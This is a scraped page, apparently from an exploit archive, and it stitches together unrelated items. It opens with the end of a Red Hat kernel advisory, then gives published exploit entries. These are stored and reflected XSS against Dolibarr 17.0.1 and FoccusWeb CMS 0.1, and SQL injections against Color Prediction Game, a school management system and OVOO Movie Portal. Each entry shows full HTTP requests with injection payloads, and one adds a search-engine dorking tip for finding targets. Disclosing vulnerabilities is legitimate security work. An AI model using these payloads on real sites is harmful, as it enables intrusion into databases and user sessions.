kernel-debuginfo-common-x86_64-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-devel-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-headers-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-tools-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-tools-libs-3.10.0-1062.77.1.el7.x86_64.rpm  
perf-3.10.0-1062.77.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
python-perf-3.10.0-1062.77.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server E4S (v. 7.7):

Source:  
kernel-3.10.0-1062.77.1.el7.src.rpm

noarch:  
kernel-abi-whitelists-3.10.0-1062.77.1.el7.noarch.rpm  
kernel-doc-3.10.0-1062.77.1.el7.noarch.rpm

ppc64le:  
bpftool-3.10.0-1062.77.1.el7.ppc64le.rpm  
bpftool-debuginfo-3.10.0-1062.77.1.el7.ppc64le.rpm  
kernel-3.10.0-1062.77.1.el7.ppc64le.rpm  
kernel-bootwrapper-3.10.0-1062.77.1.el7.ppc64le.rpm  
kernel-debug-3.10.0-1062.77.1.el7.ppc64le.rpm  
kernel-debug-debuginfo-3.10.0-1062.77.1.el7.ppc64le.rpm  
kernel-debuginfo-3.10.0-1062.77.1.el7.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-3.10.0-1062.77.1.el7.ppc64le.rpm  
kernel-devel-3.10.0-1062.77.1.el7.ppc64le.rpm  
kernel-headers-3.10.0-1062.77.1.el7.ppc64le.rpm  
kernel-tools-3.10.0-1062.77.1.el7.ppc64le.rpm  
kernel-tools-debuginfo-3.10.0-1062.77.1.el7.ppc64le.rpm  
kernel-tools-libs-3.10.0-1062.77.1.el7.ppc64le.rpm  
perf-3.10.0-1062.77.1.el7.ppc64le.rpm  
perf-debuginfo-3.10.0-1062.77.1.el7.ppc64le.rpm  
python-perf-3.10.0-1062.77.1.el7.ppc64le.rpm  
python-perf-debuginfo-3.10.0-1062.77.1.el7.ppc64le.rpm

x86_64:  
bpftool-3.10.0-1062.77.1.el7.x86_64.rpm  
bpftool-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-debug-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-debug-devel-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-devel-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-headers-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-tools-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-tools-libs-3.10.0-1062.77.1.el7.x86_64.rpm  
perf-3.10.0-1062.77.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
python-perf-3.10.0-1062.77.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server TUS (v. 7.7):

Source:  
kernel-3.10.0-1062.77.1.el7.src.rpm

noarch:  
kernel-abi-whitelists-3.10.0-1062.77.1.el7.noarch.rpm  
kernel-doc-3.10.0-1062.77.1.el7.noarch.rpm

x86_64:  
bpftool-3.10.0-1062.77.1.el7.x86_64.rpm  
bpftool-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-debug-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-debug-devel-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-devel-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-headers-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-tools-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-tools-libs-3.10.0-1062.77.1.el7.x86_64.rpm  
perf-3.10.0-1062.77.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
python-perf-3.10.0-1062.77.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional AUS (v. 7.7):

x86_64:  
bpftool-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-tools-libs-devel-3.10.0-1062.77.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional E4S (v. 7.7):

ppc64le:  
bpftool-debuginfo-3.10.0-1062.77.1.el7.ppc64le.rpm  
kernel-debug-debuginfo-3.10.0-1062.77.1.el7.ppc64le.rpm  
kernel-debug-devel-3.10.0-1062.77.1.el7.ppc64le.rpm  
kernel-debuginfo-3.10.0-1062.77.1.el7.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-3.10.0-1062.77.1.el7.ppc64le.rpm  
kernel-tools-debuginfo-3.10.0-1062.77.1.el7.ppc64le.rpm  
kernel-tools-libs-devel-3.10.0-1062.77.1.el7.ppc64le.rpm  
perf-debuginfo-3.10.0-1062.77.1.el7.ppc64le.rpm  
python-perf-debuginfo-3.10.0-1062.77.1.el7.ppc64le.rpm

x86_64:  
bpftool-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-tools-libs-devel-3.10.0-1062.77.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional TUS (v. 7.7):

x86_64:  
bpftool-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
kernel-tools-libs-devel-3.10.0-1062.77.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1062.77.1.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-35788  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk5MPmAAoJENzjgjWX9erEJfYP/3QMiTIJEWXpTWkWEVKWe8Os  
ipFn+aPYLHGc33OMdwHuh1mmacIgs2BNxEuGimoCy6IXKuTqI7Pa//m2ASY7P+IJ  
xXNhwtuMHTffiE2BTtjlc0ziC7SNjit6K0EbUtbTGWXYl1qgdGWEhVWQ0mwAge37  
t3JMd4j1IvaIhZGLPyhH3y7lS7FSuRL+Fq9b771rHtfkjHZYcmjUivbXLphLXxFo  
PVjiMcFMzTDOk4hD6AysGuP3oKkZal41e6PRBLau7l96iNKtPXKN6JV6mu5LoHXh  
cGALKswXAyiMPmKuCBOwYgZyFQYYc4DLnskK+se+Oh2KAUTF4je8AGQPs5MTHDt7  
QEWc7CXC19JQwVALVsE43BEpDEdT6Ed9hrwyU3fEQmXsWH2vxWkcZtbo9K+UNhjG  
3QFZ83XTevmhD9d2pp0I2qEavyEUnC4t9ePpbb1VJQUQ1qrndMI6bcgoiSA7RTU7  
IgPNL3Sv7pifDnV+fAwmqaDvhUJ6RxQmNn1Y5Wwl4gvz3LHIvMwUbgBJYyhksYAz  
g/N+U/cognHdPZVIJcCV7QN7htDI7HIVNtdHiQfLT90kZV3SnZBj4cWInBchDtMW  
Pj0CYGL48vRETYlKv9yc7M10g9esJ2lIT9+rsP0W9n2SEP1Sl+SOD4puIW3eMPA1  
5CmTSUrbaoREDwMzh8dT  
=9ntR  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4697-01

Dolibarr version 17.0.1 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Dolibarr Version 17.0.1 - Stored XSS# Dork: # Date: 2023-08-09# Exploit Author: Furkan Karaarslan# Category : Webapps# Vendor Homepage: http://127.0.0.1/dolibarr-17.0.1/htdocs/user/note.php# Version: 17.0.1 (REQUIRED)# Tested on: Windows/Linux# CVE : -----------------------------------------------------------------------------RequestsPOST /dolibarr-17.0.1/htdocs/user/note.php HTTP/1.1Host: 127.0.0.1Content-Length: 599Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1Origin: http://127.0.0.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://127.0.0.1/dolibarr-17.0.1/htdocs/user/note.php?action=editnote_public&token=4b1479ad024e82d298b395bfab9b1916&id=1Accept-Encoding: gzip, deflateAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7Cookie: 5c8ccd93504819395bd9eb83add769eb=g6sujc3ss8cj53cvk84qv0jgol; f758a1cd0925196cd7746824e3df122b=u04rsmdqgrdpr2kduo49gl0rmh; DOLSESSID_18109f368bbc82f2433d1d6c639db71bb97e2bd1=sud22bsu9sbqqc4bgcloki2ehtConnection: closetoken=4b1479ad024e82d298b395bfab9b1916&action=setnote_public&token=4b1479ad024e82d298b395bfab9b1916&id=1&note_public=%3Ca+onscrollend%3Dalert%281%29+style%3D%22display%3Ablock%3Boverflow%3Aauto%3Bborder%3A1px+dashed%3Bwidth%3A500px%3Bheight%3A100px%3B%22%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cspan+id%3Dx%3Etest%3C%2Fspan%3E%3C%2Fa%3E&modify=De%C4%9Fi%C5%9Ftir

Dolibarr 17.0.1 Cross Site Scripting

FoccusWeb CMS version 0.1 suffers from a cross site scripting vulnerability.

**FoccusWeb CMS 0.1 Cross Site Scripting**

Posted Aug 22, 2023

Authored by indoushka

FoccusWeb CMS version 0.1 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 4ec7d01c602a400932502d010a16a7b1bacb2f323fbd9f44c16aef7baacd0231

Download | Favorite | View

**FoccusWeb CMS 0.1 Cross Site Scripting**

    ======================================================================================================================================| # Title     : FoccusWeb CMS v0.1 XSS Vulnerability                                                                                 || # Author    : indoushka                                                                                                            || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                               | | # Vendor    : http://www.foccusweb.com/site/                                                                                       |  ======================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /resultados.html?txt-busca=1<script>alert(/indoushka/);</script>&yt0=submit[+] http://127.0.0.1/saogabrielrsgovbr/Portal/busca/resultados.html?txt-busca=1%3Cscript%3Ealert(/indoushka/);%3C/script%3E&yt0=submitGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,996)
*   Arbitrary (16,211)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,282)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,347)
*   DoS (23,452)
*   Encryption (2,370)
*   Exploit (51,936)
*   File Inclusion (4,222)
*   File Upload (976)
*   Firewall (821)
*   Info Disclosure (2,782)
*   Intrusion Detection (892)
*   Java (3,045)
*   JavaScript (859)
*   Kernel (6,681)
*   Local (14,456)
*   Magazine (586)
*   Overflow (12,693)
*   Perl (1,423)
*   PHP (5,146)
*   Proof of Concept (2,338)
*   Protocol (3,602)
*   Python (1,535)
*   Remote (30,795)
*   Root (3,587)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,640)
*   Security Tool (7,888)
*   Shell (3,185)
*   Shellcode (1,215)
*   Sniffer (894)
*   Spoof (2,207)
*   SQL Injection (16,380)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (665)
*   Vulnerability (31,786)
*   Web (9,669)
*   Whitepaper (3,750)
*   x86 (962)
*   XSS (17,949)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,819)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,494)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,741)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,834)
*   UNIX (9,291)
*   UnixWare (186)
*   Windows (6,574)
*   Other

FoccusWeb CMS 0.1 Cross Site Scripting

Color Prediction Game version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Color Prediction Game v1.0 - SQL Injection# Date: 2023-08-12# Exploit Author: Ahmet Ümit BAYRAM# Vendor: https://www.codester.com/items/44411/color-prediction-game-php-script# Tested on: Kali Linux & MacOS# CVE: N/A### Request ###POST /loginNow.php HTTP/1.1Host: localhostCookie: PHPSESSID=250594265b833a4d3a7adf6e1c136fe2User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0)Gecko/20100101 Firefox/116.0Accept: */*Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestContent-Type: multipart/form-data;boundary=---------------------------395879129218961020344050490865Content-Length: 434Origin: http://localhostReferer: http://localhost/login.phpSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: close-----------------------------395879129218961020344050490865Content-Disposition: form-data; name="login_mobile"4334343433-----------------------------395879129218961020344050490865Content-Disposition: form-data; name="login_password"123456-----------------------------395879129218961020344050490865Content-Disposition: form-data; name="action"login-----------------------------395879129218961020344050490865--### Parameter & Payloads ###Parameter: MULTIPART login_mobile ((custom) POST)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: -----------------------------395879129218961020344050490865Content-Disposition: form-data; name="login_mobile"4334343433' AND (SELECT 4472 FROM (SELECT(SLEEP(5)))UADa) AND 'PDLW'='PDLW-----------------------------395879129218961020344050490865Content-Disposition: form-data; name="login_password"123456-----------------------------395879129218961020344050490865Content-Disposition: form-data; name="action"login-----------------------------395879129218961020344050490865--

Color Prediction Game 1.0 SQL Injection

Global Multi School Management System Express version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title:  Global - Multi School Management System Express v1.0- SQL Injection# Date: 2023-08-12# Exploit Author: Ahmet Ümit BAYRAM# Vendor: https://codecanyon.net/item/global-multi-school-management-system-express/21975378# Tested on: Kali Linux & MacOS# CVE: N/A### Request ###POST /report/balance HTTP/1.1Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcwAccept: */*X-Requested-With: XMLHttpRequestReferer: http://localhostCookie: gmsms=b8d36491f08934ac621b6bc7170eaef18290469fContent-Length: 472Accept-Encoding: gzip,deflate,brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36Host: localhostConnection: Keep-alive------------YWJkMTQzNDcwContent-Disposition: form-data; name="school_id"0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z------------YWJkMTQzNDcwContent-Disposition: form-data; name="academic_year_id"------------YWJkMTQzNDcwContent-Disposition: form-data; name="group_by"------------YWJkMTQzNDcwContent-Disposition: form-data; name="date_from"------------YWJkMTQzNDcwContent-Disposition: form-data; name="date_to"------------YWJkMTQzNDcw--### Parameter & Payloads ###Parameter: MULTIPART school_id ((custom) POST)Type: error-basedTitle: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BYclause (EXTRACTVALUE)Payload: ------------YWJkMTQzNDcwContent-Disposition: form-data; name="school_id"0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z' ANDEXTRACTVALUE(1586,CONCAT(0x5c,0x71766b6b71,(SELECT(ELT(1586=1586,1))),0x716a627071)) AND 'Dyjx'='Dyjx------------YWJkMTQzNDcwContent-Disposition: form-data; name="academic_year_id"------------YWJkMTQzNDcwContent-Disposition: form-data; name="group_by"------------YWJkMTQzNDcwContent-Disposition: form-data; name="date_from"------------YWJkMTQzNDcwContent-Disposition: form-data; name="date_to"------------YWJkMTQzNDcw–

Global Multi School Management System Express 1.0 SQL Injection

OVOO Movie Portal CMS version 3.3.3 suffers from a remote SQL injection vulnerability.

    # Exploit Title: OVOO Movie Portal CMS v3.3.3 - SQL Injection# Date: 2023-08-12# Exploit Author: Ahmet Ümit BAYRAM# Vendor: https://codecanyon.net/item/ovoomovie-video-streaming-cms-with-unlimited-tvseries/20180569# Tested on: Kali Linux & MacOS# CVE: N/A### Request ###POST /filter_movies/1 HTTP/2Host: localhostCookie: ci_session=tiic5hcli8v3qkg1chgj0dqpou9495usUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0)Gecko/20100101 Firefox/116.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://localhost/movies.htmlContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 60Origin: htts://localhostSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersaction=fetch_data&minimum_rating=1&maximum_rating=6.8&page=1### Parameter & Payloads ###Parameter: maximum_rating (POST)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: action=fetch_data&minimum_rating=1&maximum_rating=6.8 AND2238=2238&page=1Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: action=fetch_data&minimum_rating=1&maximum_rating=6.8 AND (SELECT4101 FROM (SELECT(SLEEP(5)))FLwc)&page=1

Tag

#linux